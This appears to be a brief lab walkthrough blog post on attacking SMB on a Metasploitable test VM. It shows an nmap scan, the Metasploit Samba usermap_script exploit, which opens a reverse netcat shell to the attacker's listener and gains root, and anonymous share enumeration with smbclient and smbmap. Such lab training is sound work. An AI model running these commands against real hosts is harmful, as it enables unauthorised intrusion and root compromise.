Techniques for Exploiting SMB Servers

Hacker Halt
3 min readAug 29, 2024

--

Email : hackerhalt02@gmail.com

YouTube Channel : https://bit.ly/3TCtwNU

Given : 192.168.1.10 Metasploitable Machine

Nmap Port Scanning

(hackerhalt㉿kali)-[~]
└─$ nmap 192.168.1.10 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 04:27 EDT
Nmap scan report for 192.168.1.10
Host is up (0.00020s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

SMB Enumeration

(hackerhalt㉿kali)-[~]
└─$ nmap 192.168.1.10 -p445,139 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 03:58 EDT
Nmap scan report for 192.168.1.10
Host is up (0.00062s latency).

PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.45 seconds

Metasploit Framework

Scanning the Version of the SMB is Samba smbd 3.X — 4.X is Vulnerable

msf6 exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.6 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 192.168.1.6:4444
[*] Command shell session 2 opened (192.168.1.6:4444 -> 192.168.1.10:33258) at 2024-08-28 04:04:51 -0400

whoami
root

SMB Anonymous Login

For Enumerating The SMB Port We use the smbclient tool

smbclient -N -L //192.168.1.10
Anonymous login successful

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE

┌──(hackerhalt㉿kali)-[~]
└─$ smbclient //192.168.1.10/tmp
Password for [WORKGROUP\hackerhalt]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>

Server Informations Commands

Enumerating SMB

(hackerhalt㉿kali)-[~]
└─$ smbmap -H 192.168.1.10

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 192.168.1.10:445 Name: 192.168.1.10 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (metasploitable server (Samba 3.0.20-Debian))
[*] Closed 1 connections

--

--

Hacker Halt
Hacker Halt

Written by Hacker Halt

Professional Cyber Security Trainer , Red Teamer , Bug Bounty Hunter , YouTube Content Creator , CEH , VAPT , CCNA , MAPT , CFI @haltacademy